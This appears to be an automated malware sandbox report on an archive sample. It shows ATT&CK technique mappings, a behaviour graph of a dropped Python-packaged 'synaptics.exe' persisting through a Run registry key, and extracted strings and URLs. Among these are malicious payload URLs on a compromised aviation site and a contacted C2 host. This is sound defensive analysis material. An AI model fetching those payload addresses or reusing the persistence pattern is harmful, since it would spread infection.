Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_73A7150D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,14_2_73A7150D
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 14_2_6C9C2400 GetTimeZoneInformation,14_2_6C9C2400
Source: C:\Users\user\Desktop\Rar.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C712460 getsockopt,setsockopt,setsockopt,WSAGetLastError,setsockopt,WSAGetLastError,setsockopt,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,WSAGetLastError,20_2_6C712460
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_6C7121E0 bind,WSAGetLastError,20_2_6C7121E0
Source: C:\Users\Public\M20EKMMEH2\synaptics.exeCode function: 20_2_73FC2650 bind,20_2_73FC2650
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping2
System Time Discovery
Remote Services1
Archive Collected Data
12
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job11
Registry Run Keys / Startup Folder
11
Registry Run Keys / Startup Folder
1
Modify Registry
LSASS Memory11
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading
1
DLL Side-Loading
11
Process Injection
Security Account Manager3
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS23
System Information Discovery
Distributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Rundll32
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578963 Sample: DzbIZ1HRMj.zip Startdate: 20/12/2024 Architecture: WINDOWS Score: 68 43 www.aviationchartersolutions.com 2->43 45 cpanel119.turbify.biz 2->45 51 Sigma detected: New RUN Key Pointing to Suspicious Folder 2->51 53 Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder 2->53 55 Sigma detected: Suspicious Program Location with Network Connections 2->55 57 3 other signatures 2->57 7 cmd.exe 4 2->7         started        10 cmd.exe 1 2->10         started        12 rundll32.exe 2->12         started        signatures3 process4 file5 29 C:\Users\Public\Windows Security, ASCII 7->29 dropped 14 Rar.exe 1003 7->14         started        17 reg.exe 1 1 7->17         started        20 synaptics.exe 163 7->20         started        27 3 other processes 7->27 23 synaptics.exe 54 10->23         started        25 conhost.exe 10->25         started        process6 dnsIp7 31 C:\Users\Public\M20EKMMEH2\synaptics.exe, PE32 14->31 dropped 33 C:\Users\Public\M20EKMMEH2\vcruntime140.dll, PE32 14->33 dropped 35 C:\Users\Public\M20EKMMEH2\python310.dll, PE32 14->35 dropped 41 881 other files (none is malicious) 14->41 dropped 49 Creates an autostart registry key pointing to binary in C:\Windows 17->49 47 cpanel119.turbify.biz 52.0.145.89, 443, 49706, 49707 AMAZON-AESUS United States 20->47 37 C:\Users\user\Desktop\DzbIZ1HRMj.rar, RAR 27->37 dropped 39 C:\Users\Public\Windows Security.bat, Unicode 27->39 dropped file8 signatures9

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
SourceDetectionScannerLabelLink
C:\Users\Public\M20EKMMEH2\DLLs\_asyncio.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\_bz2.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\_ctypes.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\_decimal.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\_elementtree.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\_hashlib.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\_lzma.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\_msi.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\_multiprocessing.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\_overlapped.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\_queue.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\_socket.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\_sqlite3.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\_ssl.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\_uuid.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\_zoneinfo.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\libcrypto-1_1.dll0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\libffi-7.dll0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\libssl-1_1.dll0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\pyexpat.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\select.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\sqlite3.dll0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\unicodedata.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\DLLs\winsound.pyd0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\__future__.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\_aix_support.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\_bootsubprocess.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\_collections_abc.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\_compression.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\_markupbase.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\_osx_support.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\_py_abc.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\_pyio.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\_sitebuiltins.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\_strptime.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\_threading_local.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\_weakrefset.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\abc.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\aifc.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\argparse.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\ast.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\asynchat.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\asyncore.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\base64.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\bdb.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\binhex.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\bisect.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\bz2.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\cProfile.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\calendar.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\cgi.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\cgitb.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\chunk.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\cmd.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\code.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\codecs.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\collections\__init__.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\collections\abc.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\colorsys.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\compileall.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\concurrent\futures\__init__.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\concurrent\futures\_base.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\concurrent\futures\process.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\concurrent\futures\thread.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\configparser.py0%ReversingLabs
C:\Users\Public\M20EKMMEH2\Lib\contextlib.py0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
cpanel119.turbify.biz
52.0.145.89
truetrue
    unknown
    www.aviationchartersolutions.com
    unknown
    unknowntrue
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://ocsp.accv.es~Qsynaptics.exe, 0000000E.00000003.2006146636.0000000001699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1927224183.000000000169E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1963146228.000000000169E000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuysynaptics.exe, 0000000E.00000002.2054927261.0000000001040000.00000004.00000020.00020000.00000000.sdmptrue
          unknown
          https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/tuyen/tuyen_allsynaptics.exe, 0000000E.00000002.2098925843.00000000038E0000.00000004.00001000.00020000.00000000.sdmpfalse
            unknown
            http://repository.swisssign.com/Esynaptics.exe, 0000000E.00000003.2031635787.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1964387506.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001B19000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2024048436.0000000001B1B000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN)synaptics.exe, 0000000E.00000003.1665090261.0000000001661000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://bugs.python.org/issue39682synaptics.exe, 0000000E.00000003.1683425743.00000000015DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://python.org/dev/peps/pep-0263/Rar.exe, 0000000D.00000003.1515627725.00000267FB27B000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://crl.dhimyotis.com/certignarootca.crl8synaptics.exe, 0000000E.00000003.1979381178.000000000179B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1974956581.0000000001796000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://tools.ietf.org/html/rfc2388#section-4.4synaptics.exe, 0000000E.00000003.1665090261.0000000001661000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2035849609.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1752088361.000000000166B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1854439009.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2008068232.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1902935906.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1965642029.000000000166D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2057996598.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1737724453.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1875857822.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1669337534.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1993299353.000000000166E000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://web.archive.org/web/20200623061726/https://bitbucket.org/pitrou/pathlib/issues/12/synaptics.exe, 0000000E.00000003.1683425743.00000000015DE000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://bugs.python.org/issue19619synaptics.exe, 0000000E.00000003.1532800940.00000000004A0000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://bugs.python.org/issue5845#msg198636synaptics.exe, 0000000E.00000003.1537720925.0000000000497000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963synaptics.exe, 0000000E.00000003.1653243897.00000000015D1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1653243897.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.iana.org/assignments/tls-parameteEsynaptics.exe, 0000000E.00000003.1820282468.0000000001B1A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1903683751.0000000001B19000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1870679591.0000000001B19000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1792569664.0000000001B1A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1749238715.0000000001B16000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1661251659.0000000001B1A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1775753287.0000000001B18000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1884934095.0000000001B1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://crl.dhimyotis.com/certignarootca.crlsynaptics.exe, 0000000E.00000003.1979381178.0000000001798000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1979381178.000000000179B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1936275279.0000000001782000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1974956581.0000000001796000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://curl.haxx.se/rfc/cookie_spec.htmlsynaptics.exe, 0000000E.00000003.1837071396.0000000001ADA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1797188977.0000000001ADA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2089649295.0000000003790000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1771128213.00000000019E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://ocsp.accv.essynaptics.exe, 0000000E.00000003.2006146636.0000000001699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1927224183.000000000169E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1963146228.000000000169E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://bugs.python.org/msg352381synaptics.exe, 0000000E.00000003.1615880781.0000000001673000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://github.com/pyca/pyopenssl/pull/933synaptics.exe, 0000000E.00000003.1671882063.0000000001AED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1666692376.0000000001AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://bugs.python.org/issue20164synaptics.exe, 0000000E.00000003.1872057233.00000000015E1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1884206824.0000000001A05000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxysynaptics.exe, 0000000E.00000002.2081614372.0000000001EB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                https://httpbin.org/getsynaptics.exe, 0000000E.00000002.2074356493.0000000001DD0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2059820653.000000000168F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1927224183.0000000001664000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://foo.com/synaptics.exe, 0000000E.00000003.1607176248.0000000001655000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1604109987.0000000001664000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://wwww.certigna.fr/autorites/0msynaptics.exe, 0000000E.00000003.1979381178.000000000179B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1936275279.0000000001782000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1974956581.0000000001796000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://httpbin.org/synaptics.exe, 0000000E.00000003.1961070644.0000000001D30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyzsynaptics.exe, 0000000E.00000003.1752088361.000000000165D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://wwww.certigna.fr/autorites/synaptics.exe, 0000000E.00000003.2031635787.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1964387506.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2070826986.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001B19000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2024048436.0000000001B1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlsynaptics.exe, 0000000E.00000003.1615880781.0000000001673000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1625000683.0000000001672000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://github.com/urllib3/urllib3/issues/3267.synaptics.exe, 0000000E.00000003.1671882063.0000000001AED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1666692376.0000000001AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://sourceware.org/pthreads-win32/manual/pthread_barrier_init.htmlsynaptics.exe, 0000000E.00000003.1583695126.0000000001698000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1583868672.0000000001589000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.quovadisglobal.com/cps8?synaptics.exe, 0000000E.00000003.2003475235.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2011600691.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985740272.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1961070644.0000000001D30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535synaptics.exe, 0000000E.00000003.2008854194.0000000001A54000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2031635787.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1964387506.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2070826986.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001B19000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2017313231.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1749238715.0000000001B16000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1661251659.0000000001B1A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2024048436.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1666692376.0000000001B1C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1884934095.0000000001B1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://tools.ietf.org/html/rfc3986#appendix-Asynaptics.exe, 0000000E.00000003.1604109987.0000000001664000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.python.org/psf/license/synaptics.exe, 0000000E.00000002.2051315793.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1537720925.0000000000497000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://github.com/pypa/setuptools/issues/417#issuecomment-392298401synaptics.exe, 0000000E.00000002.2047461649.0000000000F30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/psf/requests/issues/3578.synaptics.exe, 0000000E.00000003.1901087710.00000000019E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://crl.securetrust.com/STCA.crlsynaptics.exe, 0000000E.00000003.2003685939.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2070826986.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985831849.0000000001B13000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2031635787.0000000001B13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://foo.com:/synaptics.exe, 0000000E.00000003.1607176248.0000000001655000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1604109987.0000000001664000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://wwwsearch.sf.net/):synaptics.exe, 0000000E.00000003.1837071396.0000000001ADA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1797188977.0000000001ADA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2003475235.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2011600691.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985740272.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1774756889.000000000150C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1771128213.00000000019E1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1961070644.0000000001D30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0synaptics.exe, 0000000E.00000003.2006146636.0000000001699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1981058371.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1927224183.000000000169E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1963146228.000000000169E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://tools.ietf.org/html/rfc6125#section-6.4.3synaptics.exe, 0000000E.00000003.1755199297.0000000001B16000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1775753287.0000000001B12000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1740211106.0000000001B11000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1749238715.0000000001B16000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2085454044.0000000003700000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1792569664.0000000001B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://crl.xrampsecurity.com/XGCA.crl0synaptics.exe, 0000000E.00000003.2000623728.0000000000489000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://tools.ietf.org/html/rfc3986#section-3.3synaptics.exe, 0000000E.00000003.1604109987.0000000001664000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://github.com/python/cpython/pull/7160#disynaptics.exe, 0000000E.00000003.1797188977.0000000001A96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://tools.ietf.org/html/rfc7230#section-3.2)synaptics.exe, 0000000E.00000003.1604109987.0000000001664000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.cert.fnmt.es/dpcs/synaptics.exe, 0000000E.00000003.1936275279.0000000001782000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1982039478.0000000001789000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://google.com/mailsynaptics.exe, 0000000E.00000003.1867809289.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1879641191.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1872057233.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1824970526.000000000163F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1888699521.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1989810343.0000000001637000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1923500924.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1998569141.000000000163F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://packaging.python.org/specifications/entry-points/synaptics.exe, 0000000E.00000003.1707543519.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1680210138.000000000171A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1740211106.0000000001AFE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1713056984.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2067676668.0000000001990000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1671882063.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1709484783.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1673166883.0000000001676000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2081614372.0000000001EB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.accv.es00synaptics.exe, 0000000E.00000003.1981058371.00000000014E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.python.org/psf/license/)synaptics.exe, 0000000E.00000003.1537720925.0000000000497000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmsynaptics.exe, 0000000E.00000003.1615880781.0000000001673000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1625000683.0000000001672000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://github.com/urllib3/urllib3/pull/3024synaptics.exe, 0000000E.00000003.1653243897.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://foss.heptapod.net/pypy/pypy/-/issues/3539synaptics.exe, 0000000E.00000003.1653243897.00000000015D1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1653243897.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
